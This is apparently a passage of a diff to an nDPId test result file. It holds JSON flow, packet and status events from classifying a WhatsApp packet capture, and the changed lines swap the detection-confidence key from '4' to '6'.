{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":353,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":353,"packets-processed":352,"total-skipped-flows":0,"total-l4-payload-len":29867,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":44,"total-detection-updates":0,"total-updates":0,"current-active-flows":11,"total-active-flows":44,"total-idle-flows":33,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":288,"global_ts_msec":1655071168997} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655071168997,"flow_last_seen":1655071168997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655071168997,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":48234,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1655071168997,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655071168997,"pkt":"eJS0JASgYDjgxTWgCABFAAA8\/oFAAD8GA8DAqAJkszzDMbxqFGaCVc7FAAAAAKAC\/\/8bsQAAAgQFtAQCCApxNV+xAAAAAAEDAwk="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1655071169028,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655071169028,"pkt":"eJS0JASgYDjgxTWgCABFAAA0\/oJAAD8GA8fAqAJkszzDMbxqFGaCVc7GXkxmWYAQAIBN7gAAAQEICnE1X+Ud8hk1"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1655071169033,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655071169033,"pkt":"eJS0JASgYDjgxTWgCABFAAA4\/oNAAD8GA8LAqAJkszzDMbxqFGaCVc7GXkxmWYAYAIAImAAAAQEICnE1X+od8hk1RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":356,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655071168997,"flow_last_seen":1655071169064,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655071169064,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":48234,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":361,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655063661893,"flow_last_seen":1655063662083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655071169315,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":40990,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":361,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655062569330,"flow_last_seen":1655062569674,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655071169315,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43978,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":356,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655071168997,"flow_last_seen":1655071169064,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655071169064,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":48234,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":361,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655063661893,"flow_last_seen":1655063662083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655071169315,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":40990,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":361,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655062569330,"flow_last_seen":1655062569674,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655071169315,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43978,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655071203961,"flow_last_seen":1655071203961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655071203961,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":55038,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1655071203961,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655071203961,"pkt":"eJS0JASgYDjgxTWgCABFAAA8rm1AAD8GU9TAqAJkszzDMdb+FGbxdk6iAAAAAKAC\/\/+sqwAAAgQFtAQCCApIWe4BAAAAAAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1655071203990,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655071203990,"pkt":"eJS0JASgYDjgxTWgCABFAAA0rm5AAD8GU9vAqAJkszzDMdb+FGbxdk6jUznIyYAQAVd2AQAAAQEICkhZ7h+G1MEa"} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1655071203998,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655071203998,"pkt":"eJS0JASgYDjgxTWgCABFAAA4rm9AAD8GU9bAqAJkszzDMdb+FGbxdk6jUznIyYAYAVcwqAAAAQEICkhZ7ieG1MEaRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":364,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655071203961,"flow_last_seen":1655071204028,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655071204028,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":55038,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":364,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655071203961,"flow_last_seen":1655071204028,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655071204028,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":55038,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655071204543,"flow_last_seen":1655071204543,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655071204543,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.70.50","src_port":55476,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1655071204543,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655071204543,"pkt":"eJS0JASgYDjgxTWgCABFAAA8pS5AAD8GbkLAqAJkHw1GMti0FGbC7URPAAAAAKAC\/\/\/+SAAAAgQFtAQCCAqV4ZcxAAAAAAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1655071204704,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655071204704,"pkt":"eJS0JASgYDjgxTWgCABFAAA0pS9AAD8GbknAqAJkHw1GMti0FGbC7URQktIbLIAQAVeaBwAAAQEICpXhl9HVew2N"} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1655071204709,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655071204709,"pkt":"eJS0JASgYDjgxTWgCABFAAA4pTBAAD8GbkTAqAJkHw1GMti0FGbC7URQktIbLIAYAVdUsQAAAQEICpXhl9bVew2NRUQAAQ=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655071204543,"flow_last_seen":1655071204870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655071204870,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.70.50","src_port":55476,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655071204543,"flow_last_seen":1655071204870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655071204870,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.70.50","src_port":55476,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":374,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":374,"packets-processed":373,"total-skipped-flows":0,"total-l4-payload-len":30706,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":47,"total-detection-updates":0,"total-updates":0,"current-active-flows":12,"total-active-flows":47,"total-idle-flows":35,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":306,"global_ts_msec":1655073402411} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":374,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655073402411,"flow_last_seen":1655073402411,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655073402411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":48538,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1655073402411,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655073402411,"pkt":"eJS0JASgYDjgxTWgCABFAAA8dBJAAD8Gji\/AqAJkszzDMb2aFGahzCxlAAAAAKAC\/\/+a8AAAAgQFtAQCCApxUGIQAAAAAAEDAwk="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1655073402445,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655073402445,"pkt":"eJS0JASgYDjgxTWgCABFAAA0dBNAAD8GjjbAqAJkszzDMb2aFGahzCxmjLLTN4AQAICpvAAAAQEICnFQYjPQSe8a"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1655073402465,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655073402465,"pkt":"eJS0JASgYDjgxTWgCABFAAA4dBRAAD8GjjHAqAJkszzDMb2aFGahzCxmjLLTN4AYAIBkWAAAAQEICnFQYkbQSe8aRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655073402411,"flow_last_seen":1655073402498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655073402498,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":48538,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655064434682,"flow_last_seen":1655064435041,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655073402833,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45290,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655065264797,"flow_last_seen":1655065265368,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655073402833,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":51544,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655065885823,"flow_last_seen":1655065885823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655073402833,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":51724,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1655065885451,"flow_last_seen":1655065885823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1655073402833,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47948,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655073402411,"flow_last_seen":1655073402498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655073402498,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":48538,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655064434682,"flow_last_seen":1655064435041,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655073402833,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45290,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655065264797,"flow_last_seen":1655065265368,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655073402833,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":51544,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655065885823,"flow_last_seen":1655065885823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655073402833,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":51724,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1655065885451,"flow_last_seen":1655065885823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1655073402833,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47948,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":382,"packets-processed":381,"total-skipped-flows":0,"total-l4-payload-len":30991,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":48,"total-detection-updates":0,"total-updates":0,"current-active-flows":9,"total-active-flows":48,"total-idle-flows":39,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":316,"global_ts_msec":1655074111508} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655074111508,"flow_last_seen":1655074111508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655074111508,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45850,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1655074111508,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655074111508,"pkt":"eJS0JASgYDjgxTWgCABFAAA8DYdAAD8G9LrAqAJkszzDMbMaFGYrB92KAAAAAKAC\/\/+Y9QAAAgQFtAQCCAo4NG1HAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1655074111556,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655074111556,"pkt":"eJS0JASgYDjgxTWgCABFAAA0DYhAAD8G9MHAqAJkszzDMbMaFGYrB92LuiGK2IAQAIABZwAAAQEICjg0bW5hoB8L"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1655074111565,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655074111565,"pkt":"eJS0JASgYDjgxTWgCABFAAA4DYlAAD8G9LzAqAJkszzDMbMaFGYrB92LuiGK2IAYAIC8AwAAAQEICjg0bYBhoB8LRUQAAQ=="} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655074111508,"flow_last_seen":1655074111606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655074111606,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45850,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655074111508,"flow_last_seen":1655074111606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655074111606,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45850,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 